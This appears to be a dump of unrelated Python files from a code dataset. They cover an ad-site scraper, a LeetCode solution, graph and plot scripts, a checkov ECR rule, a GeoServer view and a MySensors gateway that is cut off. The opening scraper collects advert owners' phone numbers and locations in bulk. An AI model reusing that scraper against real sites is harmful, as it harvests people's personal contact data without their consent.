item.find('p', {'itemprop': 'description'})\n item_text = item_text.text if item_text else ''\n if item.has_attr('data-current-category'):\n item_category = item['data-current-category']\n else:\n item_category = None\n item_price_container = item.find('dl', {'class': 'price'})\n item_price = item_price_container.find('dd').text\n price = NUMERICPATTERN.sub('', item_price)\n if len(price) > 0:\n price = int(price)\n else:\n price = None\n user_link = item.find('div', {'class': 'advert-owner__name'}).a['href']\n username = user_link.split('/')[2]\n if username not in users_list:\n users_list.add(username)\n user = await get_user(username)\n else:\n user = username\n words.append({\n 'title': item_title,\n 'text': item_text,\n 'url': url,\n 'category': item_category,\n 'price': price,\n 'user': user\n })\n\n\nasync def get_user(user):\n url = url_advert(\"/profile/{}/\".format(user))\n async with aiohttp.ClientSession(headers=headers) as session:\n html = await fetch(session, url)\n soup = BS(html, \"html.parser\")\n profile = soup.find('div', {'class': 'profile-info'})\n contact_info = profile.find('div', {'class': 'contact-info'})\n location = contact_info.p.span.text if contact_info.p.span else None\n contacts_box = profile.find('div', {'class': 'contacts'})\n contacts = contacts_box.dl.dd.find_all('span', {'class': 'phones'}) if contacts_box.dl else []\n numbers = []\n for contact in contacts:\n numbers.append(contact.text)\n user = {\n 'name': user,\n 'phones': numbers,\n 'location': location\n }\n return user\n\n\nasync def hours_parser(category, dt, hour, words):\n url = url_maker(category, dt, hour)\n async with aiohttp.ClientSession(headers=headers) as session:\n html = await fetch(session, url)\n soup = BS(html, \"html.parser\")\n links_container = soup.find('div', {'class': 'inline-links'})\n links = links_container.find_all('a', href=True) if links_container else None\n if links:\n parsers = [asyncio.ensure_future(word_parser(url_advert(link['href']), words)) for link in links]\n await asyncio.wait(parsers)\n\n\nasync def days_parser(category_name, dt):\n words = []\n filename = os.path.join('categories', category_name, \"{}.pickle\".format(date_snake(dt)))\n os.makedirs(os.path.dirname(filename), exist_ok=True)\n if not os.path.isfile(filename):\n print(\"FETCHING {} date {}\".format(category_name, dt))\n tasks = [asyncio.ensure_future(hours_parser(category_name, dt, i, words)) for i in hours]\n await asyncio.wait(tasks)\n with open(filename, 'wb') as fp:\n pickle.dump(words, fp)\n fp.close()\n\n\nasync def category_task(category_name):\n tasks = [asyncio.ensure_future(days_parser(category_name, dt)) for dt in dates]\n await asyncio.wait(tasks)\n print(\"COMPLETE {}\".format(category_name))\n\n\nasync def run_tasks():\n # подгрузка распарсеных юзеров\n for cat, _ in categories:\n files_list = os.listdir(os.path.join(THIS_FOLDER, 'categories', cat))\n for file in files_list:\n filename = os.path.join(THIS_FOLDER, 'categories', cat, file)\n if os.path.isfile(filename):\n with open(filename, 'rb') as f:\n adverts = pickle.load(f)\n for advert in adverts:\n if advert['user']:\n if isinstance(advert['user'], dict):\n users_list.add(advert['user']['name'])\n else:\n users_list.add(advert['user'])\n tasks = [asyncio.ensure_future(category_task(i)) for i, n in categories]\n await asyncio.wait(tasks)\n\n\nif __name__ == \"__main__\":\n loop = asyncio.get_event_loop()\n loop.run_until_complete(run_tasks())\n loop.close()\n","sub_path":"task.py","file_name":"task.py","file_ext":"py","file_size_in_byte":6181,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"18372964","text":"'''\nGiven an array nums, write a function to move all 0's to the end of it while maintaining the relative order of the non-zero elements.\n\nExample:\n\nInput: [0,1,0,3,12]\nOutput: [1,3,12,0,0]\nNote:\n\nYou must do this in-place without making a copy of the array.\nMinimize the total number of operations.\n'''\n\nclass Solution(object):\n def moveZeroes(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: None Do not return anything, modify nums in-place instead.\n \"\"\"\n z_pointer = 0\n non_z_pointer = 0\n # i = 0\n while z_pointer < len(nums) and non_z_pointer < len(nums):\n # i += 1\n # for i in range(len(nums)):\n try:\n if nums[non_z_pointer] == 0:\n non_z_pointer += 1\n if nums[z_pointer] != 0:\n z_pointer += 1\n if nums[non_z_pointer] != 0 and nums[z_pointer] == 0 and (non_z_pointer > z_pointer):\n nums[non_z_pointer], nums[z_pointer] = nums[z_pointer], nums[non_z_pointer]\n non_z_pointer += 1\n z_pointer += 1\n elif nums[non_z_pointer] != 0 and nums[z_pointer] == 0 and (non_z_pointer < z_pointer): # 感覺條件判斷可以更簡短一些\n non_z_pointer += 1\n except IndexError:\n break\n # print(i)\n\nnums = [0,1,0,3,12]\nSolution.moveZeroes(0, nums)\nprint(nums)\n\nnums = [0,0,1]\nSolution.moveZeroes(0, nums)\nprint(nums)\n\nnums = [0,0,0,1,2,3,0,0]\nSolution.moveZeroes(0, nums)\nprint(nums)\n\nnums = [1,0]\nSolution.moveZeroes(0, nums)\nprint(nums)\n\nnums = [1,0,1]\nSolution.moveZeroes(0, nums)\nprint(nums)\n\n\n# https://leetcode.com/problems/move-zeroes/discuss/563197/Python-simple-solution-Faster-than-73.17\nclass Solution:\n def moveZeroes(self, nums: List[int]) -> None:\n first_zero = 0\n for i in range(0, len(nums)):\n if nums[i] != 0:\n nums[first_zero], nums[i] = nums[i], nums[first_zero]\n first_zero += 1\n\n\n# https://leetcode.com/explore/other/card/30-day-leetcoding-challenge/528/week-1/3286/discuss/562750/Python-O(n)-solution\nclass Solution:\n def moveZeroes(self, nums: List[int]) -> None:\n first_zero_index = -1\n for i in range(len(nums)):\n if nums[i] == 0 and first_zero_index == -1:\n first_zero_index = i\n if nums[i] != 0 and first_zero_index != -1:\n nums[i], nums[first_zero_index] = nums[first_zero_index], nums[i]\n first_zero_index = first_zero_index + 1","sub_path":"leetcode/30 days challenge/04. Move Zeroes.py","file_name":"04. Move Zeroes.py","file_ext":"py","file_size_in_byte":2587,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"330889399","text":"#Autor: Roberto Kenji Hiramatsu\n#Suporte para copia de arquivo por pscp\n#Data: 2016-09-04\n\nfrom subprocess import call\nimport os,sys\n\ndef copia(ident,desti=\"D:\\\\temp\\\\teste4\",pastaOri=\"/home/yakumo/openface/huawei/usputil/video4\"):\n\tnident = int(ident)\n\tcaminho = \"{}/*_i{:04d}_*\".format(pastaOri,nident)\n\torige=\"yakumo@localhost:{}\".format(caminho)\n\tcall([\"pscp\",\"-P\",\"4722\",\"-i\",\"C:\\\\Users\\\\kenji\\\\face.ppk\",orige,desti])\n\ndef pastaOk(desti=\"D:\\\\temp\\\\teste4\\\\\"):\n\tif os.path.exists(desti):\n\t\tif os.path.isdir(desti):\n\t\t\treturn True\n\telse:\n\t\tos.mkdir(desti)\n\t\treturn True\n\treturn False\n","sub_path":"Linux/Python/usputil/video/externoexec4.py","file_name":"externoexec4.py","file_ext":"py","file_size_in_byte":588,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"399157599","text":"import logging\nimport os\nimport subprocess\nimport time\n\nfrom MySQLdb import connect\n\nimport manage\nfrom minicms.settings import DATABASES\n\nlogger = logging.getLogger(__name__)\ntry:\n dbinfo = DATABASES['default']\n dbname = dbinfo['NAME']\n while True:\n try:\n conn = connect(\n host=dbinfo['HOST'],\n user=dbinfo['USER'],\n password=dbinfo['PASSWORD']\n )\n break\n except Exception as e:\n logger.error(e)\n time.sleep(2)\n try:\n cs = conn.cursor()\n cs.execute(r\"CREATE DATABASE `%s` DEFAULT CHARACTER SET utf8 COLLATE utf8_general_ci\" % dbname)\n except Exception as e:\n logger.error(e)\n if subprocess.run([\"python\", \"manage.py\", \"sqldiff\", \"-a\"]).returncode != 0:\n manage.main([\"manage.py\", \"makemigrations\", \"--check\"])\n manage.main([\"manage.py\", \"migrate\"])\nexcept Exception as e:\n logger.error(e)\nfinally:\n listen_addr = os.getenv('LISTEN_ADDR', '0.0.0.0')\n listen_port = os.getenv('LISTEN_PORT', '8000')\n\n manage.main([\"manage.py\", \"runserver\", \"%s:%s\" % (listen_addr, listen_port)])\n","sub_path":"launch.py","file_name":"launch.py","file_ext":"py","file_size_in_byte":1157,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"355332577","text":"from typing import Sized\nimport networkx as nx\nimport matplotlib as plt\n\nfile=\"graph1.txt\"\n#file=\"graph2.txt\"\n\nG = nx.read_edgelist(file,create_using=nx.Graph(), nodetype = int)\n\n#Mount the graph with the properties\ncountA=0\ncountB=0\ncountU=0\nlist=[] # (no,grau)\n\n\n\nfor i in G.nodes():\n \n if (i%10==0) or (i%10==1)or (i%10==2)or (i%10==3):\n G.add_node(i,vote=\"A\",degree=G.degree(i)) # procurar como se faz size\n list.append((i,G.degree(i))) # terminar\n countA+=1\n elif (i%10==4) or (i%10==5) or (i%10==6) or (i%10==7):\n G.add_node(i,vote=\"B\",degree=G.neighbors(i))\n list.append((i,G.degree(i)))\n countB+=1\n else:\n G.add_node(i,vote=\"U\",degree=G.neighbors(i))\n list.append((i,G.degree(i)))\n countU+=1\n\n# ordenação\nlist.sort(reverse=True,key=lambda a: (a[1],-a[0]))\n\nlist2=list[:21]\nprint(list2)\n\n\n# Function that decide to vote \ndef vote(n):\n voteN=\"U\"\n countAf=0\n countBf=0\n\n for i in G.neighbors(n):\n if G.nodes[i]['vote']==\"A\":\n countAf+=1\n elif G.nodes[i]['vote']==\"B\":\n countBf+=1\n \n if countAf>countBf:\n voteN=\"A\"\n elif countBf>countAf:\n voteN=\"B\"\n\n return voteN\n\n\nfor x in range(len(list2)):\n # Reset ao grafo\n countAaux=0\n countBaux=0\n countUaux=0\n\n for n in G.nodes():\n if (n%10==0) or (n%10==1)or (n%10==2)or (n%10==3):\n G.nodes[n]['vote']=\"A\"\n countAaux+=1\n elif (n%10==4) or (n%10==5) or (n%10==6) or (n%10==7):\n G.nodes[n]['vote']=\"B\"\n countBaux+=1\n else:\n G.nodes[n]['vote']=\"U\"\n countUaux+=1\n\n #iterações\n print(\"--------------------------------------------- x: \",x)\n\n hasU=True\n iteration=-1\n countU=-1\n\n print(\"list2[0]: \",list2[x])\n\n\n for j in range(x):\n G.nodes[list2[j][0]]['vote']=\"A\"\n\n\n # Do the cicle while someone is still deciding how to vote\n while hasU:\n iteration+=1\n hasU=False\n countUanterior=countU\n countA=0\n countB=0\n countU=0\n list3=[]\n\n # search for new voters\n for i in G.nodes():\n if (G.nodes[i]['vote']==\"U\"):\n hasU=True\n countU+=1\n list3.append((i,vote(i)))\n #G.nodes[i]['vote']=vote(i)\n elif G.nodes[i]['vote']==\"A\":\n countA+=1\n elif G.nodes[i]['vote']==\"B\":\n countB+=1\n\n\n #Changing the votes that had decided in this round\n for i in list3:\n G.nodes[i[0]]['vote']=i[1]\n \n #if no one else whant to vote\n if countU==countUanterior:\n break \n\n # show results\n print(\"iteração: \",iteration)\n print(\"countA: \",countA)\n print(\"countB: \",countB)\n print(\"countU: \",countU)\n print(\"Diff: \",countB-countA)\n\n","sub_path":"HW#3/2c).py","file_name":"2c).py","file_ext":"py","file_size_in_byte":2891,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"90928620","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Dec 21 16:25:53 2016\n\n@author: Xin\n#calcuate fields PDF \n\"\"\"\nimport h5py\nimport numpy as np\nimport matplotlib.pyplot as plt\nh5file = h5py.File('conver.h5','r+')\n#rng = np.random.RandomState(10) # deterministic random data\n#a = np.hstack((rng.normal(size=1000),rng.normal(loc=5, scale=2, size=1000)))\n#b=10*np.random.randn(10) \n#plt.hist(b, bins='auto') # plt.hist passes it's arguments to np.histogram\n#plt.title(\"Histogram with 'auto' bins\")\n#plt.show()\n\n#plt.plot(x, norm.pdf(x),'r-', lw=5, alpha=0.6, label='norm pdf')\n\n\n\n#specify rerun_tag\nistep='174000'\nnorm_const = 1.0/0.2874\nlarge_label = '$\\overline {S}_{ij}\\overline{B}_i\\overline{B}_j$'\nsmall_label = '${S}_{ij}{B}_i{B}_j-\\overline {S}_{ij}\\overline{B}_i\\overline{B}_j$'\n\n\n\ndef init(istep):\n delimiter = ''\n mylist = ['Fields/','P60converion','/',istep]\n filepath = delimiter.join(mylist)\n databk = h5file.get(filepath)\n large_data = np.array(databk)\n\n mylist = ['diff/','P','/',istep]\n filepath = delimiter.join(mylist)\n databk = h5file.get(filepath)\n small_data = np.array(databk)\n\n return large_data, small_data\n\n\n\ndef visuliz(istep, data, norm_const, scale):\n \n data_2d = norm_const*data[:,:,0]\n plt.figure(1, figsize = (2.6,2.6), dpi=600)\n plt.rc('font', family='Helvetica', size=3)\n plt.imshow(data_2d, origin='none', aspect=1,\n cmap='coolwarm',vmin=-scale,vmax=scale)\n plt.colorbar()\n plt.tight_layout()\n plt.axis('off')\n plt.savefig('vis.pdf', bbox_inches='tight')\n plt.clf()\n \n\n\ndef hist(data, norm_const, xlabel):\n plt.clf()\n data = data.reshape(data.shape[0]*data.shape[1]*data.shape[2])\n data = norm_const*data\n\n plt.hist(data, bins=500, density='True',histtype='step', log='True') \n plt.ylim((1E-8, 2*10))\n plt.xlim((-1000, 1000))\n plt.xlabel(xlabel, fontsize=10, color='black', fontname=\"Helvetica\")\n\n fig = plt.gcf()\n fig.set_size_inches(2.6, 2.6)\n plt.tight_layout()\n mean = np.around(np.mean(data), decimals=2)\n plt.axvline(x=np.mean(data),color='r')\n ax = fig.add_subplot(111)\n ax.annotate('mean\\n='+str(mean), xy=(mean, 1), xytext=(mean+20, 0.5),\n arrowprops=dict(arrowstyle=\"->\"))\n\n delimiter = ''\n titlelist = ['pdf.eps']\n title=delimiter.join(titlelist)\n plt.savefig(title, format='eps', dpi=600)\n plt.show()\n\n\n\nldata, sdata = init(istep)\nhist(sdata, norm_const, small_label)\nvisuliz(istep, sdata, norm_const, 100)\n\n\nhist(ldata, norm_const, large_label)\nvisuliz(istep, ldata, norm_const, 20)\n\n\nh5file.close()\n","sub_path":"MHD_histo.py","file_name":"MHD_histo.py","file_ext":"py","file_size_in_byte":2571,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"426891509","text":"\"\"\"\nrequires graphviz + pygraphvix to be installed\n\n\"\"\"\n\n\ntry:\n import numpy as np\n import networkx as nx\n from networkx import graphviz_layout\n import matplotlib.pyplot as plt\n import matplotlib.colors as col\n import matplotlib.cm as cmx \nexcept ImportError:\n raise ImportError(\"Req numpy, networkx, Graphviz and either PyGraphviz or Pydot\")\n\n# go\ndata = np.reshape(np.random.random(size=1000), (100, 10))\nadjMat = np.corrcoef(data)\n\nadjMat[adjMat <= 0.5] = 0\n\ngraph = nx.Graph(adjMat)\n\n# find distance from node 0\npath = nx.shortest_path_length(graph, 0)\n\n# set positions of nodes with graphviz\npos = graphviz_layout(graph, prog='twopi',\n args='') # prog = [‘neato’|’dot’|’twopi’|’circo’|’fdp’|’nop’]\n\n# set the color of each edge by its weight\nnCol = range(graph.number_of_edges())\nedges = [(u,v) for (u,v,d) in graph.edges(data=True)]\n\nweights = []\nfor i in range(len(edges)):\n tmp = graph.edge[edges[i][0]][edges[i][1]]['weight']\n weights.append(tmp)\n\ncmap = plt.get_cmap('YlGnBu')\nnorm = col.Normalize(vmin=0, \n\t vmax=1)\nscalarMap = cmx.ScalarMappable(norm=norm, \n\t cmap=cmap)\ncolorList = []\nfor i in range(len(nCol)):\n tmp = scalarMap.to_rgba(weights[i])\n colorList.append(tmp)\n\n# draw the graph: dark blues are stronger weights\nnx.draw(graph, pos, node_color='#A0CBE2', \n edge_color=colorList,\n node_size=100, \n width=2, \n edge_cmap=plt.cm.YlGnBu, \n with_labels=False)\n\n# and dark reds are closer to origin node\nnx.draw_networkx_nodes(graph, pos, nodelist=path.keys(),\n node_size=150,\n node_color=path.values(),\n cmap=plt.cm.Reds_r)\n\nplt.show()","sub_path":"rough/networkx_test_circularTree_plot.py","file_name":"networkx_test_circularTree_plot.py","file_ext":"py","file_size_in_byte":1876,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"534729682","text":"from PIL import Image\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport sys\nimport os\nimport tensorflow as tf\n#from scnn_test import *\n\ndef pil2arr(imfile):\n path = '../data/Flicker8k_Dataset/'\n # load the image and return\n im = Image.open(path+imfile)\n #im_data_seq = im.getdata()\n #print(np.array(im_data_seq).shape)\n #im_data_arr = np.array(im_data_seq, dtype=float).reshape(im.size[0], im.size[1], 3)\n im_data_arr = np.array(im)\n #print(im.size)\n #print(im_data_arr.shape)\n #im.show()\n return im_data_arr\n\ndef read_file_list(n):\n # Read a dict from index to filename for both image and caption\n file_info = '../data/flickr_audio/wav2capt.txt'\n files_sp = []\n files_im = []\n with open(file_info, 'r') as f:\n for i in range(n):\n files = f.readline()\n files_part = files.split()\n cur_sp = files_part[0]\n cur_im = files_part[1]\n #print(cur_sp, cur_im)\n files_sp.append(cur_sp)\n files_im.append(cur_im)\n #print(cur_im[125:129])\n return files_sp, files_im\n\ndef read_captions(captfiles):\n # Read a dict from image file to its text caption\n file_info = '../data/Flickr8k_text/Flickr8k.token.txt'\n text_capts = {}\n with open(file_info, 'r') as f:\n while len(f.readline()) > 0:\n files = f.readline()\n files_part = files.split()\n nparts = len(files_part)\n cur_sp_parts = files_part[0].split('#')\n cur_sp = cur_sp_parts[0]\n #print(len(cur_sp))\n textcap = ''\n for k in range(nparts-1):\n textcap = textcap+files_part[k+1]+' '\n #print(textcap)\n text_capts[cur_sp] = textcap\n return text_capts\n\ndef annotate(imids):\n # Get the top n caption indices of the current image.\n #scnn_test(captions, images, n)\n data = np.load('top_indices_ann.npz')\n top_ids = data['arr_0']\n [n, ndata] = top_ids.shape\n nim = imids.shape[0]\n files_sp, files_im = read_file_list(ndata)\n text_capts = read_captions(files_im)\n # Transpose to size n x ndata if the dimension of the list is fliped \n if n > ndata:\n top_ids = np.transpose(top_ids)\n [n, ndata] = top_ids.shape\n \n # Find the images for the caption and plot it\n for i in range(nim):\n #right = (np.amin(np.abs(top_ids[:, i]-i)) == 0)\n cur_capts = []\n # If the image is correctly retrieved, show it and the rest associated with the queried caption\n #if right:\n #print('Top indices', top_ids[:, imids[i]])\n for j in range(n):\n cur_im_idx = int(top_ids[j, imids[i]])\n cur_name_im = files_im[cur_im_idx]\n cur_name_sp = files_sp[i]\n #print('Line 217 the image', cur_name_im, 'is related to the caption', cur_name_sp)\n curcapt = text_capts[cur_name_im]\n cur_capts.append(curcapt)\n #cur_im = pil2arr(cur_name_im)\n # Merge the image side-by-side\n #np.concatenate((cur_ims, cur_im), axis=1)\n # Print the captions\n print(curcapt)\n print('\\n')\n # Print the current image\n plt.figure()\n right_im_name = files_im[imids[i]]\n cur_im_arr = pil2arr(right_im_name)\n plt.imshow(cur_im_arr)\n plt.axis('off')\n plt.show()\n\ngood_ids = []\ndata = np.load('top_indices_ann.npz')\ntop_ids = data['arr_0']\nndata = top_ids.shape[1]\nfor i in range(ndata):\n if not np.amin(np.abs(top_ids[:, i]-i)):\n good_ids.append(i)\n\ngood_ids = np.array(good_ids)\nannotate(good_ids)","sub_path":"speech2image/SemEmbedding/annotate.py","file_name":"annotate.py","file_ext":"py","file_size_in_byte":3634,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"560071263","text":"#!/usr/bin/env python3\n\nfrom bucket_test import TestType, BucketTest\n\n\ndef main():\n bucket_test = BucketTest(\n test_type=TestType.ABTESTING,\n y_axis=\"CTR\",\n category_name=\"design\",\n filter_name=\"device\",\n categories={\n 'A': ['10303394', '03948402', '30495043', '30495906'],\n 'B': ['04342343', '64748877', '33677675', '98657939'],\n },\n x_axis=\"date\",\n )\n\n bucket_test.render()\n\n bucket_test.compute_pvalues()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":491,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"507082951","text":"from Products.Five import BrowserView\n\nfrom collective.geo.kml.interfaces import IKMLOpenLayersView\nfrom zope.interface import implements\n\nfrom collective.geo.geoserver.interfaces import IGeoServer\nfrom zope.component import getUtility\n\nimport types\nfrom DateTime import DateTime\nfrom DateTime.interfaces import DateTimeError\n\nfrom collective.geo.geoserver.config import FORM_PREFIX\n\nclass GeoQueryView(BrowserView):\n \"\"\" GeoQuery default view \"\"\"\n\n implements(IKMLOpenLayersView)\n\n undef='--'\n formpp=FORM_PREFIX\n\n def drange(self,start, stop, step):\n r = start\n while r < stop - step:\n n = r + step \n yield r,n\n r = n\n \n def f_label(self,k):\n return k.replace('_',' ').capitalize()\n \n def f_id(self,k,prefix=''):\n return '%s%s%s'%(self.formpp,prefix,k.replace(' ','_').lower())\n \n def eval_single_type(self,el): \n tp=type(el)\n if tp in [types.UnicodeType,types.StringType]: \n try:\n dt=DateTime(el)\n tp=DateTime\n except DateTimeError:\n pass\n \n return tp\n \n def eval_list_type(self,vect):\n return set([self.eval_single_type(i) for i in vect])\n \n def f_val_ident(self,v):\n return dict(lab=v,val=v)\n\n def f_val_str(self,v):\n return dict(lab=self.f_label(v),val=v)\n\n def f_val_range(self,b,t):\n return dict(lab='%s < x < %s'%(b,t),val='%s_%s'%(b,t))\n\n def f_val_drange(self,b,t):\n return dict(lab=b,val='%s_%s'%(b,t))\n \n def check_in(self,b,t,vect):\n return len([v for v in vect if b < v < t])>0\n\n def check_in_date(self,b,t,vect):\n return len([v for v in vect if b < DateTime(v) < t])>0 \n\n def f_vals(self,vect): \n tps=self.eval_list_type(vect) \n prefix='eq_'\n if len(tps)==1:\n #the list has same type for all elements \n tp=tps.pop()\n if tp in [types.UnicodeType,types.StringType]:\n res=[self.f_val_str(v) for v in vect]\n prefix='eq_'\n elif tp in [types.FloatType,]:\n mx=max(vect)\n rmx=round(mx)\n if rmxmn:\n rmn-=1 \n res=[self.f_val_range(b,t) for b,t in self.drange(rmn,rmx,(rmx-rmn)/10) if self.check_in(b,t,vect)]\n prefix='in_'\n elif tp is DateTime: \n mx=DateTime((DateTime(max(vect))+1).Date())\n mn=DateTime(DateTime(min(vect)).Date()) \n res=[self.f_val_drange(b.Date(),t.Date()) for b,t in self.drange(mn,mx+1,1) if self.check_in_date(b,t,vect)]\n prefix='in_'\n else: \n res=[self.f_val_ident(v) for v in vect]\n else:\n #cannot format \n res=[self.f_val_ident(v) for v in vect]\n \n return prefix,[self.f_val_ident(self.undef),]+res\n \n def gen_select(self,k,v):\n prefix,vals=self.f_vals(v)\n id=self.f_id(k,prefix=prefix)\n return dict(label=self.f_label(k),\n id=id,\n vals=vals,\n selected=self.request.get(id,self.undef))\n\n def get_available_menus(self):\n ut=getUtility(IGeoServer)\n datas=ut.getDatas(self.context.getLayer()) \n return [self.gen_select(k,v) for k,v in datas.items()]\n\n def __call__(self): \n for k,v in self.request.items():\n if self.formpp in k:\n if v==self.undef:\n #reset value\n try:\n self.request.SESSION.delete(k)\n except KeyError:\n pass\n else:\n self.request.SESSION.set(k,v)\n \n for k in self.request.SESSION.keys():\n if self.formpp in k and self.request.get(k,None) is None:\n self.request.SESSION.delete(k)\n \n return super(GeoQueryView,self).__call__()\n\n\nclass KMLDocument(BrowserView):\n formpp=FORM_PREFIX\n \n def mk_filter(self,ut,k,v):\n div='_'\n parts=k.split(div)\n #filter type\n f=parts[1]\n \n col_name=div.join(parts[2:])\n \n ff=None\n if f=='eq':\n ff=ut.fun_cql_eq(col_name,v)\n elif f=='in':\n ff=ut.fun_cql_in(col_name,v.split('_'))\n \n return ff\n \n def __call__(self):\n ut=getUtility(IGeoServer)\n ss_filters=[]\n \n cql_user_filter=self.context.getCqlfilter().strip()\n if cql_user_filter is not None and len(cql_user_filter)>0:\n ss_filters.append(cql_user_filter)\n \n for k,v in self.request.SESSION.items():\n if self.formpp in k:\n filt=self.mk_filter(ut,k,v) \n if filt is not None:\n ss_filters.append(filt)\n self.request.SESSION.delete(k)\n \n self.request.response.setHeader('Content-Type', '%s;charset=utf-8'%ut.getFormat())\n return ut.getMap(self.context.getLayer(),\n self.context.getSrid(),\n ut.buildCqlFilterByRequest(ss_filters))\n\n\n\n\n \n","sub_path":"src/collective/geo/geoserver/browser/geoquery_view.py","file_name":"geoquery_view.py","file_ext":"py","file_size_in_byte":5538,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"161616971","text":"#!/usr/bin/python\n#\n# Copyright 2013 Red Hat\n# All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\n# Reads in a list of exclude regular expressions from a file and outputs a\n# regex suitable to be passed into testr\n\nimport sys\n\nre = []\nwith open(sys.argv[1]) as fp:\n for line in fp:\n line = line.strip()\n if not line or line[0] == '#':\n continue\n re.append(line)\nprint(\"^(?!(%s))\" % \"|\".join(re))\n","sub_path":"elements/tempest/tests2skip.py","file_name":"tests2skip.py","file_ext":"py","file_size_in_byte":948,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"519757152","text":"from checkov.common.models.enums import CheckResult, CheckCategories\nfrom checkov.cloudformation.checks.resource.base_resource_check import BaseResourceCheck\n\n\nclass ECRPolicy(BaseResourceCheck):\n def __init__(self):\n name = \"Ensure ECR policy is not set to public\"\n id = \"CKV_AWS_32\"\n supported_resources = ['AWS::ECR::Repository']\n categories = [CheckCategories.GENERAL_SECURITY]\n super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources)\n\n def scan_resource_conf(self, conf):\n \"\"\"\n Looks for public * policy for ecr repository:\n https://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-ecr-repository.html\n :param conf: aws_ecr_repository configuration\n :return: \n \"\"\"\n if 'Properties' in conf.keys():\n if 'RepositoryPolicyText' in conf['Properties'].keys():\n if 'Statement' in conf['Properties']['RepositoryPolicyText'].keys():\n for statement in conf['Properties']['RepositoryPolicyText']['Statement']:\n if 'Principal' in statement.keys():\n for principal in statement['Principal']:\n if principal == \"*\":\n return CheckResult.FAILED\n return CheckResult.PASSED\n\n\ncheck = ECRPolicy()\n","sub_path":"checkov/cloudformation/checks/resource/aws/ECRPolicy.py","file_name":"ECRPolicy.py","file_ext":"py","file_size_in_byte":1423,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"71984893","text":"import argparse\nimport glob\n\nimport os\n\nfrom util.util import copy_file\n\n# construct the argument parser and parse the arguments\nap = argparse.ArgumentParser()\nap.add_argument(\"-f\", \"--first_images_folder\", required=True, help=\"Path to the first folder of images\")\nap.add_argument(\"-s\", \"--second_images_folder\", required=True, help=\"Path to the second folder of images \")\nap.add_argument(\"-d\", \"--result_destination\", required=True, help=\"Path to the folder in which save the result\")\nargs = vars(ap.parse_args())\n\n# build a dict where key is an image name and value is a full path to that image\ndef build_dict(images_folder):\n d = {}\n for image_path in glob.glob(os.path.join(images_folder, \"*\")):\n key = image_path.rsplit(os.sep, 1)[-1]\n value = image_path\n d[key] = value\n return d\n\n\nf = build_dict(args[\"first_images_folder\"])\ns = build_dict(args[\"second_images_folder\"])\n\nf_keys = set(f.keys())\ns_keys = set(s.keys())\n\n# find difference\ndiff = f_keys - s_keys\n\n\nfor key in diff:\n copy_file(f[key], os.path.join(args[\"result_destination\"], key))\n","sub_path":"util/find_relative_complement.py","file_name":"find_relative_complement.py","file_ext":"py","file_size_in_byte":1084,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"65600751","text":"\"\"\"Implement a TCP gateway.\"\"\"\nimport asyncio\nimport ipaddress\nimport logging\nimport select\nimport socket\nimport threading\nimport time\n\nimport serial.threaded\nfrom getmac import get_mac_address\n\nfrom mysensors import (BaseAsyncGateway, BaseMySensorsProtocol,\n BaseTransportGateway, Message, ThreadingGateway)\n\n_LOGGER = logging.getLogger(__name__)\n\n\nclass BaseTCPGateway(BaseTransportGateway):\n \"\"\"MySensors base TCP gateway.\"\"\"\n\n # pylint: disable=abstract-method\n\n def __init__(self, host, port=5003, **kwargs):\n \"\"\"Set up base TCP gateway.\"\"\"\n super().__init__(**kwargs)\n self.server_address = (host, port)\n self.tcp_check_timer = time.time()\n self.tcp_disconnect_timer = time.time()\n self.const.Internal.I_VERSION.set_handler(\n self.handlers, self._handle_i_version)\n\n def _check_connection(self):\n \"\"\"Check if connection is alive every reconnect_timeout seconds.\"\"\"\n if ((self.tcp_disconnect_timer + 2 * self.reconnect_timeout) <\n time.time()):\n self.tcp_disconnect_timer = time.time()\n raise OSError('No response from {}. Disconnecting'.format(\n self.server_address))\n if (self.tcp_check_timer + self.reconnect_timeout) >= time.time():\n return\n msg = Message().copy(\n child_id=255, type=self.const.MessageType.internal,\n sub_type=self.const.Internal.I_VERSION)\n self.add_job(msg.encode)\n self.tcp_check_timer = time.time()\n\n def _handle_i_version(self, msg): # pylint: disable=useless-return\n # pylint: disable=unused-argument\n self.tcp_disconnect_timer = time.time()\n return None\n\n def get_gateway_id(self):\n \"\"\"Return a unique id for the gateway.\"\"\"\n host, _ = self.server_address\n try:\n ip_address = ipaddress.ip_address(host)\n except ValueError:\n # Only hosts using ip address supports unique id.\n return None\n if ip_address.version == 6:\n mac = get_mac_address(ip6=host)\n else:\n mac = get_mac_address(ip=host)\n return mac\n\n\nclass TCPGateway(BaseTCPGateway, ThreadingGateway):\n 